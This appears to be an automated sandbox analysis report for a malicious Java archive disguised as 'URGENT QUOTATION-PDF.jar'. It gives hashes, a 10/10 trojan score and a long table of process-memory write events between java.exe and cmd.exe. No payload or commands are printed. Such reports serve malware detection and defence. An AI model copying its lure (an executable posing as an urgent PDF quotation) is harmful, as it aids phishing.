c588edfabfe42bc8f6aacfcaac5e28df2b72c354eeebbec732fe361676527ab0

Analysis

max time kernel
118s
max time network
153s
platform
windows7_x64
resource
win7
submitted
10/07/2020, 09:11

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

URGENT QUOTATION-PDF.jar
Size

403KB
MD5

817352b92f56c7e138392367aafb957c
SHA1

6b22bc04e2ec929b3fbdcbedac0b73f3dc53b6da
SHA256

c588edfabfe42bc8f6aacfcaac5e28df2b72c354eeebbec732fe361676527ab0
SHA512

ba4488fedaa5573774096eaebbd8aa2a80bafb5360c28d4224ecd89db0d81ed58f87c9695d5c0b02b299bcba53056c7f17b5337ca9fdf3e62fdff65a01a36b44

Score

10^/10

persistence evasion trojan discovery

Malware Config

Signatures

Suspicious use of WriteProcessMemory 765 IoCs

description	pid	Process	procid_target
PID 1496 wrote to memory of 1032	1496	java.exe	25
PID 1496 wrote to memory of 1032	1496	java.exe	25
PID 1496 wrote to memory of 1032	1496	java.exe	25
PID 1496 wrote to memory of 1516	1496	java.exe	26
PID 1496 wrote to memory of 1516	1496	java.exe	26
PID 1496 wrote to memory of 1516	1496	java.exe	26
PID 1516 wrote to memory of 1508	1516	cmd.exe	27
PID 1516 wrote to memory of 1508	1516	cmd.exe	27
PID 1516 wrote to memory of 1508	1516	cmd.exe	27
PID 1496 wrote to memory of 1812	1496	java.exe	28
PID 1496 wrote to memory of 1812	1496	java.exe	28
PID 1496 wrote to memory of 1812	1496	java.exe	28
PID 1812 wrote to memory of 1772	1812	cmd.exe	29
PID 1812 wrote to memory of 1772	1812	cmd.exe	29
PID 1812 wrote to memory of 1772	1812	cmd.exe	29
PID 1496 wrote to memory of 1852	1496	java.exe	30
PID 1496 wrote to memory of 1852	1496	java.exe	30
PID 1496 wrote to memory of 1852	1496	java.exe	30
PID 1496 wrote to memory of 1876	1496	java.exe	31
PID 1496 wrote to memory of 1876	1496	java.exe	31
PID 1496 wrote to memory of 1876	1496	java.exe	31
PID 1496 wrote to memory of 1916	1496	java.exe	32
PID 1496 wrote to memory of 1916	1496	java.exe	32
PID 1496 wrote to memory of 1916	1496	java.exe	32
PID 1496 wrote to memory of 1912	1496	java.exe	33
PID 1496 wrote to memory of 1912	1496	java.exe	33
PID 1496 wrote to memory of 1912	1496	java.exe	33
PID 1496 wrote to memory of 1136	1496	java.exe	34
PID 1496 wrote to memory of 1136	1496	java.exe	34
PID 1496 wrote to memory of 1136	1496	java.exe	34
PID 1496 wrote to memory of 1864	1496	java.exe	35
PID 1496 wrote to memory of 1864	1496	java.exe	35
PID 1496 wrote to memory of 1864	1496	java.exe	35
PID 1496 wrote to memory of 1824	1496	java.exe	36
PID 1496 wrote to memory of 1824	1496	java.exe	36
PID 1496 wrote to memory of 1824	1496	java.exe	36
PID 1496 wrote to memory of 1860	1496	java.exe	37
PID 1496 wrote to memory of 1860	1496	java.exe	37
PID 1496 wrote to memory of 1860	1496	java.exe	37
PID 1496 wrote to memory of 1568	1496	java.exe	38
PID 1496 wrote to memory of 1568	1496	java.exe	38
PID 1496 wrote to memory of 1568	1496	java.exe	38
PID 1496 wrote to memory of 1660	1496	java.exe	39
PID 1496 wrote to memory of 1660	1496	java.exe	39
PID 1496 wrote to memory of 1660	1496	java.exe	39
PID 1496 wrote to memory of 1548	1496	java.exe	40
PID 1496 wrote to memory of 1548	1496	java.exe	40
PID 1496 wrote to memory of 1548	1496	java.exe	40
PID 1496 wrote to memory of 1624	1496	java.exe	41
PID 1496 wrote to memory of 1624	1496	java.exe	41
PID 1496 wrote to memory of 1624	1496	java.exe	41
PID 1496 wrote to memory of 1984	1496	java.exe	42
PID 1496 wrote to memory of 1984	1496	java.exe	42
PID 1496 wrote to memory of 1984	1496	java.exe	42
PID 1496 wrote to memory of 1948	1496	java.exe	44
PID 1496 wrote to memory of 1948	1496	java.exe	44
PID 1496 wrote to memory of 1948	1496	java.exe	44
PID 1624 wrote to memory of 1056	1624	cmd.exe	45
PID 1624 wrote to memory of 1056	1624	cmd.exe	45
PID 1624 wrote to memory of 1056	1624	cmd.exe	45
PID 1496 wrote to memory of 328	1496	java.exe	50
PID 1496 wrote to memory of 328	1496	java.exe	50
PID 1496 wrote to memory of 328	1496	java.exe	50
PID 1624 wrote to memory of 2036	1624	cmd.exe	47
PID 1624 wrote to memory of 2036	1624	cmd.exe	47
PID 1624 wrote to memory of 2036	1624	cmd.exe	47
PID 1496 wrote to memory of 1264	1496	java.exe	53
PID 1496 wrote to memory of 1264	1496	java.exe	53
PID 1496 wrote to memory of 1264	1496	java.exe	53
PID 1496 wrote to memory of 1476	1496	java.exe	54
PID 1496 wrote to memory of 1476	1496	java.exe	54
PID 1496 wrote to memory of 1476	1496	java.exe	54
PID 1496 wrote to memory of 1460	1496	java.exe	55
PID 1496 wrote to memory of 1460	1496	java.exe	55
PID 1496 wrote to memory of 1460	1496	java.exe	55
PID 1496 wrote to memory of 368	1496	java.exe	57
PID 1496 wrote to memory of 368	1496	java.exe	57
PID 1496 wrote to memory of 368	1496	java.exe	57
PID 1496 wrote to memory of 908	1496	java.exe	60
PID 1496 wrote to memory of 908	1496	java.exe	60
PID 1496 wrote to memory of 908	1496	java.exe	60
PID 1496 wrote to memory of 1500	1496	java.exe	61
PID 1496 wrote to memory of 1500	1496	java.exe	61
PID 1496 wrote to memory of 1500	1496	java.exe	61
PID 1476 wrote to memory of 1764	1476	cmd.exe	62
PID 1476 wrote to memory of 1764	1476	cmd.exe	62
PID 1476 wrote to memory of 1764	1476	cmd.exe	62
PID 1496 wrote to memory of 1772	1496	java.exe	65
PID 1496 wrote to memory of 1772	1496	java.exe	65
PID 1496 wrote to memory of 1772	1496	java.exe	65
PID 1496 wrote to memory of 1884	1496	java.exe	66
PID 1496 wrote to memory of 1884	1496	java.exe	66
PID 1496 wrote to memory of 1884	1496	java.exe	66
PID 1496 wrote to memory of 1340	1496	java.exe	68
PID 1496 wrote to memory of 1340	1496	java.exe	68
PID 1496 wrote to memory of 1340	1496	java.exe	68
PID 1496 wrote to memory of 1932	1496	java.exe	70
PID 1496 wrote to memory of 1932	1496	java.exe	70
PID 1496 wrote to memory of 1932	1496	java.exe	70
PID 1496 wrote to memory of 1516	1496	java.exe	73
PID 1496 wrote to memory of 1516	1496	java.exe	73
PID 1496 wrote to memory of 1516	1496	java.exe	73
PID 1476 wrote to memory of 1032	1476	cmd.exe	74
PID 1476 wrote to memory of 1032	1476	cmd.exe	74
PID 1476 wrote to memory of 1032	1476	cmd.exe	74
PID 1496 wrote to memory of 2004	1496	java.exe	76
PID 1496 wrote to memory of 2004	1496	java.exe	76
PID 1496 wrote to memory of 2004	1496	java.exe	76
PID 1496 wrote to memory of 2020	1496	java.exe	78
PID 1496 wrote to memory of 2020	1496	java.exe	78
PID 1496 wrote to memory of 2020	1496	java.exe	78
PID 1496 wrote to memory of 1348	1496	java.exe	79
PID 1496 wrote to memory of 1348	1496	java.exe	79
PID 1496 wrote to memory of 1348	1496	java.exe	79
PID 1496 wrote to memory of 1120	1496	java.exe	82
PID 1496 wrote to memory of 1120	1496	java.exe	82
PID 1496 wrote to memory of 1120	1496	java.exe	82
PID 1496 wrote to memory of 1988	1496	java.exe	84
PID 1496 wrote to memory of 1988	1496	java.exe	84
PID 1496 wrote to memory of 1988	1496	java.exe	84
PID 1120 wrote to memory of 1760	1120	cmd.exe	85
PID 1120 wrote to memory of 1760	1120	cmd.exe	85
PID 1120 wrote to memory of 1760	1120	cmd.exe	85
PID 1496 wrote to memory of 2012	1496	java.exe	87
PID 1496 wrote to memory of 2012	1496	java.exe	87
PID 1496 wrote to memory of 2012	1496	java.exe	87
PID 1496 wrote to memory of 1548	1496	java.exe	89
PID 1496 wrote to memory of 1548	1496	java.exe	89
PID 1496 wrote to memory of 1548	1496	java.exe	89
PID 1120 wrote to memory of 1872	1120	cmd.exe	90
PID 1120 wrote to memory of 1872	1120	cmd.exe	90
PID 1120 wrote to memory of 1872	1120	cmd.exe	90
PID 1496 wrote to memory of 328	1496	java.exe	92
PID 1496 wrote to memory of 328	1496	java.exe	92
PID 1496 wrote to memory of 328	1496	java.exe	92
PID 1496 wrote to memory of 1508	1496	java.exe	93
PID 1496 wrote to memory of 1508	1496	java.exe	93
PID 1496 wrote to memory of 1508	1496	java.exe	93
PID 1496 wrote to memory of 576	1496	java.exe	95
PID 1496 wrote to memory of 576	1496	java.exe	95
PID 1496 wrote to memory of 576	1496	java.exe	95
PID 1496 wrote to memory of 1648	1496	java.exe	96
PID 1496 wrote to memory of 1648	1496	java.exe	96
PID 1496 wrote to memory of 1648	1496	java.exe	96
PID 576 wrote to memory of 1020	576	cmd.exe	98
PID 576 wrote to memory of 1020	576	cmd.exe	98
PID 576 wrote to memory of 1020	576	cmd.exe	98
PID 576 wrote to memory of 1852	576	cmd.exe	100
PID 576 wrote to memory of 1852	576	cmd.exe	100
PID 576 wrote to memory of 1852	576	cmd.exe	100
PID 1496 wrote to memory of 1860	1496	java.exe	101
PID 1496 wrote to memory of 1860	1496	java.exe	101
PID 1496 wrote to memory of 1860	1496	java.exe	101
PID 1496 wrote to memory of 1840	1496	java.exe	102
PID 1496 wrote to memory of 1840	1496	java.exe	102
PID 1496 wrote to memory of 1840	1496	java.exe	102
PID 1860 wrote to memory of 1900	1860	cmd.exe	103
PID 1860 wrote to memory of 1900	1860	cmd.exe	103
PID 1860 wrote to memory of 1900	1860	cmd.exe	103
PID 1860 wrote to memory of 1148	1860	cmd.exe	105
PID 1860 wrote to memory of 1148	1860	cmd.exe	105
PID 1860 wrote to memory of 1148	1860	cmd.exe	105
PID 1496 wrote to memory of 1692	1496	java.exe	106
PID 1496 wrote to memory of 1692	1496	java.exe	106
PID 1496 wrote to memory of 1692	1496	java.exe	106
PID 1692 wrote to memory of 1880	1692	cmd.exe	107
PID 1692 wrote to memory of 1880	1692	cmd.exe	107
PID 1692 wrote to memory of 1880	1692	cmd.exe	107
PID 1692 wrote to memory of 1912	1692	cmd.exe	108
PID 1692 wrote to memory of 1912	1692	cmd.exe	108
PID 1692 wrote to memory of 1912	1692	cmd.exe	108
PID 1496 wrote to memory of 1576	1496	java.exe	109
PID 1496 wrote to memory of 1576	1496	java.exe	109
PID 1496 wrote to memory of 1576	1496	java.exe	109
PID 1576 wrote to memory of 1936	1576	cmd.exe	110
PID 1576 wrote to memory of 1936	1576	cmd.exe	110
PID 1576 wrote to memory of 1936	1576	cmd.exe	110
PID 1576 wrote to memory of 1932	1576	cmd.exe	111
PID 1576 wrote to memory of 1932	1576	cmd.exe	111
PID 1576 wrote to memory of 1932	1576	cmd.exe	111
PID 1496 wrote to memory of 568	1496	java.exe	112
PID 1496 wrote to memory of 568	1496	java.exe	112
PID 1496 wrote to memory of 568	1496	java.exe	112
PID 568 wrote to memory of 1832	568	cmd.exe	113
PID 568 wrote to memory of 1832	568	cmd.exe	113
PID 568 wrote to memory of 1832	568	cmd.exe	113
PID 568 wrote to memory of 1876	568	cmd.exe	114
PID 568 wrote to memory of 1876	568	cmd.exe	114
PID 568 wrote to memory of 1876	568	cmd.exe	114
PID 1496 wrote to memory of 1544	1496	java.exe	115
PID 1496 wrote to memory of 1544	1496	java.exe	115
PID 1496 wrote to memory of 1544	1496	java.exe	115
PID 1544 wrote to memory of 1548	1544	cmd.exe	116
PID 1544 wrote to memory of 1548	1544	cmd.exe	116
PID 1544 wrote to memory of 1548	1544	cmd.exe	116
PID 1544 wrote to memory of 1348	1544	cmd.exe	117
PID 1544 wrote to memory of 1348	1544	cmd.exe	117
PID 1544 wrote to memory of 1348	1544	cmd.exe	117
PID 1496 wrote to memory of 1532	1496	java.exe	118
PID 1496 wrote to memory of 1532	1496	java.exe	118
PID 1496 wrote to memory of 1532	1496	java.exe	118
PID 1532 wrote to memory of 1820	1532	cmd.exe	119
PID 1532 wrote to memory of 1820	1532	cmd.exe	119
PID 1532 wrote to memory of 1820	1532	cmd.exe	119
PID 1532 wrote to memory of 1948	1532	cmd.exe	120
PID 1532 wrote to memory of 1948	1532	cmd.exe	120
PID 1532 wrote to memory of 1948	1532	cmd.exe	120
PID 1496 wrote to memory of 316	1496	java.exe	121
PID 1496 wrote to memory of 316	1496	java.exe	121
PID 1496 wrote to memory of 316	1496	java.exe	121
PID 1496 wrote to memory of 1340	1496	java.exe	123
PID 1496 wrote to memory of 1340	1496	java.exe	123
PID 1496 wrote to memory of 1340	1496	java.exe	123
PID 1340 wrote to memory of 620	1340	cmd.exe	124
PID 1340 wrote to memory of 620	1340	cmd.exe	124
PID 1340 wrote to memory of 620	1340	cmd.exe	124
PID 1340 wrote to memory of 1864	1340	cmd.exe	125
PID 1340 wrote to memory of 1864	1340	cmd.exe	125
PID 1340 wrote to memory of 1864	1340	cmd.exe	125
PID 1496 wrote to memory of 612	1496	java.exe	126
PID 1496 wrote to memory of 612	1496	java.exe	126
PID 1496 wrote to memory of 612	1496	java.exe	126
PID 612 wrote to memory of 1852	612	cmd.exe	127
PID 612 wrote to memory of 1852	612	cmd.exe	127
PID 612 wrote to memory of 1852	612	cmd.exe	127
PID 612 wrote to memory of 1384	612	cmd.exe	128
PID 612 wrote to memory of 1384	612	cmd.exe	128
PID 612 wrote to memory of 1384	612	cmd.exe	128
PID 1496 wrote to memory of 2036	1496	java.exe	129
PID 1496 wrote to memory of 2036	1496	java.exe	129
PID 1496 wrote to memory of 2036	1496	java.exe	129
PID 2036 wrote to memory of 1412	2036	cmd.exe	130
PID 2036 wrote to memory of 1412	2036	cmd.exe	130
PID 2036 wrote to memory of 1412	2036	cmd.exe	130
PID 2036 wrote to memory of 1912	2036	cmd.exe	131
PID 2036 wrote to memory of 1912	2036	cmd.exe	131
PID 2036 wrote to memory of 1912	2036	cmd.exe	131
PID 1496 wrote to memory of 1936	1496	java.exe	132
PID 1496 wrote to memory of 1936	1496	java.exe	132
PID 1496 wrote to memory of 1936	1496	java.exe	132
PID 1936 wrote to memory of 1028	1936	cmd.exe	133
PID 1936 wrote to memory of 1028	1936	cmd.exe	133
PID 1936 wrote to memory of 1028	1936	cmd.exe	133
PID 1936 wrote to memory of 1872	1936	cmd.exe	134
PID 1936 wrote to memory of 1872	1936	cmd.exe	134
PID 1936 wrote to memory of 1872	1936	cmd.exe	134
PID 1496 wrote to memory of 1932	1496	java.exe	135
PID 1496 wrote to memory of 1932	1496	java.exe	135
PID 1496 wrote to memory of 1932	1496	java.exe	135
PID 1932 wrote to memory of 2012	1932	cmd.exe	136
PID 1932 wrote to memory of 2012	1932	cmd.exe	136
PID 1932 wrote to memory of 2012	1932	cmd.exe	136
PID 1932 wrote to memory of 1756	1932	cmd.exe	137
PID 1932 wrote to memory of 1756	1932	cmd.exe	137
PID 1932 wrote to memory of 1756	1932	cmd.exe	137
PID 1496 wrote to memory of 1584	1496	java.exe	138
PID 1496 wrote to memory of 1584	1496	java.exe	138
PID 1496 wrote to memory of 1584	1496	java.exe	138
PID 1584 wrote to memory of 1080	1584	cmd.exe	139
PID 1584 wrote to memory of 1080	1584	cmd.exe	139
PID 1584 wrote to memory of 1080	1584	cmd.exe	139
PID 1584 wrote to memory of 1764	1584	cmd.exe	140
PID 1584 wrote to memory of 1764	1584	cmd.exe	140
PID 1584 wrote to memory of 1764	1584	cmd.exe	140
PID 1496 wrote to memory of 1572	1496	java.exe	141
PID 1496 wrote to memory of 1572	1496	java.exe	141
PID 1496 wrote to memory of 1572	1496	java.exe	141
PID 1496 wrote to memory of 1776	1496	java.exe	142
PID 1496 wrote to memory of 1776	1496	java.exe	142
PID 1496 wrote to memory of 1776	1496	java.exe	142
PID 1776 wrote to memory of 1516	1776	cmd.exe	144
PID 1776 wrote to memory of 1516	1776	cmd.exe	144
PID 1776 wrote to memory of 1516	1776	cmd.exe	144
PID 1776 wrote to memory of 1264	1776	cmd.exe	145
PID 1776 wrote to memory of 1264	1776	cmd.exe	145
PID 1776 wrote to memory of 1264	1776	cmd.exe	145
PID 1496 wrote to memory of 1512	1496	java.exe	146
PID 1496 wrote to memory of 1512	1496	java.exe	146
PID 1496 wrote to memory of 1512	1496	java.exe	146
PID 1512 wrote to memory of 1952	1512	cmd.exe	147
PID 1512 wrote to memory of 1952	1512	cmd.exe	147
PID 1512 wrote to memory of 1952	1512	cmd.exe	147
PID 1512 wrote to memory of 2024	1512	cmd.exe	148
PID 1512 wrote to memory of 2024	1512	cmd.exe	148
PID 1512 wrote to memory of 2024	1512	cmd.exe	148
PID 1496 wrote to memory of 1128	1496	java.exe	149
PID 1496 wrote to memory of 1128	1496	java.exe	149
PID 1496 wrote to memory of 1128	1496	java.exe	149
PID 1128 wrote to memory of 1732	1128	cmd.exe	150
PID 1128 wrote to memory of 1732	1128	cmd.exe	150
PID 1128 wrote to memory of 1732	1128	cmd.exe	150
PID 1128 wrote to memory of 1556	1128	cmd.exe	151
PID 1128 wrote to memory of 1556	1128	cmd.exe	151
PID 1128 wrote to memory of 1556	1128	cmd.exe	151
PID 1496 wrote to memory of 1148	1496	java.exe	152
PID 1496 wrote to memory of 1148	1496	java.exe	152
PID 1496 wrote to memory of 1148	1496	java.exe	152
PID 1148 wrote to memory of 1852	1148	cmd.exe	153
PID 1148 wrote to memory of 1852	1148	cmd.exe	153
PID 1148 wrote to memory of 1852	1148	cmd.exe	153
PID 1148 wrote to memory of 1828	1148	cmd.exe	154
PID 1148 wrote to memory of 1828	1148	cmd.exe	154
PID 1148 wrote to memory of 1828	1148	cmd.exe	154
PID 1496 wrote to memory of 1296	1496	java.exe	155
PID 1496 wrote to memory of 1296	1496	java.exe	155
PID 1496 wrote to memory of 1296	1496	java.exe	155
PID 1296 wrote to memory of 1920	1296	cmd.exe	156
PID 1296 wrote to memory of 1920	1296	cmd.exe	156
PID 1296 wrote to memory of 1920	1296	cmd.exe	156
PID 1296 wrote to memory of 292	1296	cmd.exe	157
PID 1296 wrote to memory of 292	1296	cmd.exe	157
PID 1296 wrote to memory of 292	1296	cmd.exe	157
PID 1496 wrote to memory of 1900	1496	java.exe	158
PID 1496 wrote to memory of 1900	1496	java.exe	158
PID 1496 wrote to memory of 1900	1496	java.exe	158
PID 1900 wrote to memory of 1508	1900	cmd.exe	159
PID 1900 wrote to memory of 1508	1900	cmd.exe	159
PID 1900 wrote to memory of 1508	1900	cmd.exe	159
PID 1900 wrote to memory of 316	1900	cmd.exe	160
PID 1900 wrote to memory of 316	1900	cmd.exe	160
PID 1900 wrote to memory of 316	1900	cmd.exe	160
PID 1496 wrote to memory of 1876	1496	java.exe	161
PID 1496 wrote to memory of 1876	1496	java.exe	161
PID 1496 wrote to memory of 1876	1496	java.exe	161
PID 1876 wrote to memory of 368	1876	cmd.exe	162
PID 1876 wrote to memory of 368	1876	cmd.exe	162
PID 1876 wrote to memory of 368	1876	cmd.exe	162
PID 1876 wrote to memory of 2012	1876	cmd.exe	163
PID 1876 wrote to memory of 2012	1876	cmd.exe	163
PID 1876 wrote to memory of 2012	1876	cmd.exe	163
PID 1496 wrote to memory of 1348	1496	java.exe	164
PID 1496 wrote to memory of 1348	1496	java.exe	164
PID 1496 wrote to memory of 1348	1496	java.exe	164
PID 1348 wrote to memory of 1948	1348	cmd.exe	165
PID 1348 wrote to memory of 1948	1348	cmd.exe	165
PID 1348 wrote to memory of 1948	1348	cmd.exe	165
PID 1348 wrote to memory of 1764	1348	cmd.exe	166
PID 1348 wrote to memory of 1764	1348	cmd.exe	166
PID 1348 wrote to memory of 1764	1348	cmd.exe	166
PID 1496 wrote to memory of 868	1496	java.exe	167
PID 1496 wrote to memory of 868	1496	java.exe	167
PID 1496 wrote to memory of 868	1496	java.exe	167
PID 868 wrote to memory of 1388	868	cmd.exe	168
PID 868 wrote to memory of 1388	868	cmd.exe	168
PID 868 wrote to memory of 1388	868	cmd.exe	168
PID 868 wrote to memory of 1264	868	cmd.exe	169
PID 868 wrote to memory of 1264	868	cmd.exe	169
PID 868 wrote to memory of 1264	868	cmd.exe	169
PID 1496 wrote to memory of 1760	1496	java.exe	170
PID 1496 wrote to memory of 1760	1496	java.exe	170
PID 1496 wrote to memory of 1760	1496	java.exe	170
PID 1760 wrote to memory of 2000	1760	cmd.exe	171
PID 1760 wrote to memory of 2000	1760	cmd.exe	171
PID 1760 wrote to memory of 2000	1760	cmd.exe	171
PID 1496 wrote to memory of 328	1496	java.exe	172
PID 1496 wrote to memory of 328	1496	java.exe	172
PID 1496 wrote to memory of 328	1496	java.exe	172
PID 1760 wrote to memory of 1572	1760	cmd.exe	173
PID 1760 wrote to memory of 1572	1760	cmd.exe	173
PID 1760 wrote to memory of 1572	1760	cmd.exe	173
PID 1496 wrote to memory of 1332	1496	java.exe	175
PID 1496 wrote to memory of 1332	1496	java.exe	175
PID 1496 wrote to memory of 1332	1496	java.exe	175
PID 1332 wrote to memory of 1784	1332	cmd.exe	176
PID 1332 wrote to memory of 1784	1332	cmd.exe	176
PID 1332 wrote to memory of 1784	1332	cmd.exe	176
PID 1332 wrote to memory of 1964	1332	cmd.exe	177
PID 1332 wrote to memory of 1964	1332	cmd.exe	177
PID 1332 wrote to memory of 1964	1332	cmd.exe	177
PID 1496 wrote to memory of 1640	1496	java.exe	178
PID 1496 wrote to memory of 1640	1496	java.exe	178
PID 1496 wrote to memory of 1640	1496	java.exe	178
PID 1640 wrote to memory of 1940	1640	cmd.exe	179
PID 1640 wrote to memory of 1940	1640	cmd.exe	179
PID 1640 wrote to memory of 1940	1640	cmd.exe	179
PID 1640 wrote to memory of 1732	1640	cmd.exe	180
PID 1640 wrote to memory of 1732	1640	cmd.exe	180
PID 1640 wrote to memory of 1732	1640	cmd.exe	180
PID 1496 wrote to memory of 1880	1496	java.exe	181
PID 1496 wrote to memory of 1880	1496	java.exe	181
PID 1496 wrote to memory of 1880	1496	java.exe	181
PID 1880 wrote to memory of 1852	1880	cmd.exe	182
PID 1880 wrote to memory of 1852	1880	cmd.exe	182
PID 1880 wrote to memory of 1852	1880	cmd.exe	182
PID 1880 wrote to memory of 1912	1880	cmd.exe	183
PID 1880 wrote to memory of 1912	1880	cmd.exe	183
PID 1880 wrote to memory of 1912	1880	cmd.exe	183
PID 1496 wrote to memory of 924	1496	java.exe	184
PID 1496 wrote to memory of 924	1496	java.exe	184
PID 1496 wrote to memory of 924	1496	java.exe	184
PID 924 wrote to memory of 292	924	cmd.exe	185
PID 924 wrote to memory of 292	924	cmd.exe	185
PID 924 wrote to memory of 292	924	cmd.exe	185
PID 924 wrote to memory of 1772	924	cmd.exe	186
PID 924 wrote to memory of 1772	924	cmd.exe	186
PID 924 wrote to memory of 1772	924	cmd.exe	186
PID 1496 wrote to memory of 1628	1496	java.exe	187
PID 1496 wrote to memory of 1628	1496	java.exe	187
PID 1496 wrote to memory of 1628	1496	java.exe	187
PID 1628 wrote to memory of 1844	1628	cmd.exe	188
PID 1628 wrote to memory of 1844	1628	cmd.exe	188
PID 1628 wrote to memory of 1844	1628	cmd.exe	188
PID 1628 wrote to memory of 368	1628	cmd.exe	189
PID 1628 wrote to memory of 368	1628	cmd.exe	189
PID 1628 wrote to memory of 368	1628	cmd.exe	189
PID 1496 wrote to memory of 1988	1496	java.exe	190
PID 1496 wrote to memory of 1988	1496	java.exe	190
PID 1496 wrote to memory of 1988	1496	java.exe	190
PID 1988 wrote to memory of 1032	1988	cmd.exe	191
PID 1988 wrote to memory of 1032	1988	cmd.exe	191
PID 1988 wrote to memory of 1032	1988	cmd.exe	191
PID 1988 wrote to memory of 1764	1988	cmd.exe	192
PID 1988 wrote to memory of 1764	1988	cmd.exe	192
PID 1988 wrote to memory of 1764	1988	cmd.exe	192
PID 1496 wrote to memory of 1516	1496	java.exe	193
PID 1496 wrote to memory of 1516	1496	java.exe	193
PID 1496 wrote to memory of 1516	1496	java.exe	193
PID 1516 wrote to memory of 1132	1516	cmd.exe	194
PID 1516 wrote to memory of 1132	1516	cmd.exe	194
PID 1516 wrote to memory of 1132	1516	cmd.exe	194
PID 1516 wrote to memory of 1472	1516	cmd.exe	195
PID 1516 wrote to memory of 1472	1516	cmd.exe	195
PID 1516 wrote to memory of 1472	1516	cmd.exe	195
PID 1496 wrote to memory of 2000	1496	java.exe	196
PID 1496 wrote to memory of 2000	1496	java.exe	196
PID 1496 wrote to memory of 2000	1496	java.exe	196
PID 2000 wrote to memory of 1572	2000	cmd.exe	197
PID 2000 wrote to memory of 1572	2000	cmd.exe	197
PID 2000 wrote to memory of 1572	2000	cmd.exe	197
PID 2000 wrote to memory of 1980	2000	cmd.exe	198
PID 2000 wrote to memory of 1980	2000	cmd.exe	198
PID 2000 wrote to memory of 1980	2000	cmd.exe	198
PID 1496 wrote to memory of 1952	1496	java.exe	199
PID 1496 wrote to memory of 1952	1496	java.exe	199
PID 1496 wrote to memory of 1952	1496	java.exe	199
PID 1952 wrote to memory of 1344	1952	cmd.exe	200
PID 1952 wrote to memory of 1344	1952	cmd.exe	200
PID 1952 wrote to memory of 1344	1952	cmd.exe	200
PID 1952 wrote to memory of 1384	1952	cmd.exe	201
PID 1952 wrote to memory of 1384	1952	cmd.exe	201
PID 1952 wrote to memory of 1384	1952	cmd.exe	201
PID 1496 wrote to memory of 1592	1496	java.exe	202
PID 1496 wrote to memory of 1592	1496	java.exe	202
PID 1496 wrote to memory of 1592	1496	java.exe	202
PID 1592 wrote to memory of 1648	1592	cmd.exe	203
PID 1592 wrote to memory of 1648	1592	cmd.exe	203
PID 1592 wrote to memory of 1648	1592	cmd.exe	203
PID 1592 wrote to memory of 328	1592	cmd.exe	204
PID 1592 wrote to memory of 328	1592	cmd.exe	204
PID 1592 wrote to memory of 328	1592	cmd.exe	204
PID 1496 wrote to memory of 1480	1496	java.exe	205
PID 1496 wrote to memory of 1480	1496	java.exe	205
PID 1496 wrote to memory of 1480	1496	java.exe	205
PID 1480 wrote to memory of 1828	1480	cmd.exe	206
PID 1480 wrote to memory of 1828	1480	cmd.exe	206
PID 1480 wrote to memory of 1828	1480	cmd.exe	206
PID 1480 wrote to memory of 1852	1480	cmd.exe	207
PID 1480 wrote to memory of 1852	1480	cmd.exe	207
PID 1480 wrote to memory of 1852	1480	cmd.exe	207
PID 1496 wrote to memory of 1832	1496	java.exe	208
PID 1496 wrote to memory of 1832	1496	java.exe	208
PID 1496 wrote to memory of 1832	1496	java.exe	208
PID 1832 wrote to memory of 1508	1832	cmd.exe	209
PID 1832 wrote to memory of 1508	1832	cmd.exe	209
PID 1832 wrote to memory of 1508	1832	cmd.exe	209
PID 1832 wrote to memory of 1772	1832	cmd.exe	210
PID 1832 wrote to memory of 1772	1832	cmd.exe	210
PID 1832 wrote to memory of 1772	1832	cmd.exe	210
PID 1496 wrote to memory of 1212	1496	java.exe	211
PID 1496 wrote to memory of 1212	1496	java.exe	211
PID 1496 wrote to memory of 1212	1496	java.exe	211
PID 1212 wrote to memory of 1548	1212	cmd.exe	212
PID 1212 wrote to memory of 1548	1212	cmd.exe	212
PID 1212 wrote to memory of 1548	1212	cmd.exe	212
PID 1212 wrote to memory of 680	1212	cmd.exe	213
PID 1212 wrote to memory of 680	1212	cmd.exe	213
PID 1212 wrote to memory of 680	1212	cmd.exe	213
PID 1496 wrote to memory of 1032	1496	java.exe	214
PID 1496 wrote to memory of 1032	1496	java.exe	214
PID 1496 wrote to memory of 1032	1496	java.exe	214
PID 1496 wrote to memory of 1388	1496	java.exe	215
PID 1496 wrote to memory of 1388	1496	java.exe	215
PID 1496 wrote to memory of 1388	1496	java.exe	215
PID 1032 wrote to memory of 1136	1032	cmd.exe	216
PID 1032 wrote to memory of 1136	1032	cmd.exe	216
PID 1032 wrote to memory of 1136	1032	cmd.exe	216
PID 1032 wrote to memory of 812	1032	cmd.exe	218
PID 1032 wrote to memory of 812	1032	cmd.exe	218
PID 1032 wrote to memory of 812	1032	cmd.exe	218
PID 1496 wrote to memory of 1500	1496	java.exe	219
PID 1496 wrote to memory of 1500	1496	java.exe	219
PID 1496 wrote to memory of 1500	1496	java.exe	219
PID 1500 wrote to memory of 1384	1500	cmd.exe	220
PID 1500 wrote to memory of 1384	1500	cmd.exe	220
PID 1500 wrote to memory of 1384	1500	cmd.exe	220
PID 1500 wrote to memory of 1960	1500	cmd.exe	221
PID 1500 wrote to memory of 1960	1500	cmd.exe	221
PID 1500 wrote to memory of 1960	1500	cmd.exe	221
PID 1496 wrote to memory of 328	1496	java.exe	222
PID 1496 wrote to memory of 328	1496	java.exe	222
PID 1496 wrote to memory of 328	1496	java.exe	222
PID 328 wrote to memory of 1884	328	cmd.exe	223
PID 328 wrote to memory of 1884	328	cmd.exe	223
PID 328 wrote to memory of 1884	328	cmd.exe	223
PID 328 wrote to memory of 1984	328	cmd.exe	224
PID 328 wrote to memory of 1984	328	cmd.exe	224
PID 328 wrote to memory of 1984	328	cmd.exe	224
PID 1496 wrote to memory of 1028	1496	java.exe	225
PID 1496 wrote to memory of 1028	1496	java.exe	225
PID 1496 wrote to memory of 1028	1496	java.exe	225
PID 1028 wrote to memory of 1508	1028	cmd.exe	226
PID 1028 wrote to memory of 1508	1028	cmd.exe	226
PID 1028 wrote to memory of 1508	1028	cmd.exe	226
PID 1028 wrote to memory of 1844	1028	cmd.exe	227
PID 1028 wrote to memory of 1844	1028	cmd.exe	227
PID 1028 wrote to memory of 1844	1028	cmd.exe	227
PID 1496 wrote to memory of 2040	1496	java.exe	228
PID 1496 wrote to memory of 2040	1496	java.exe	228
PID 1496 wrote to memory of 2040	1496	java.exe	228
PID 2040 wrote to memory of 680	2040	cmd.exe	229
PID 2040 wrote to memory of 680	2040	cmd.exe	229
PID 2040 wrote to memory of 680	2040	cmd.exe	229
PID 2040 wrote to memory of 1264	2040	cmd.exe	230
PID 2040 wrote to memory of 1264	2040	cmd.exe	230
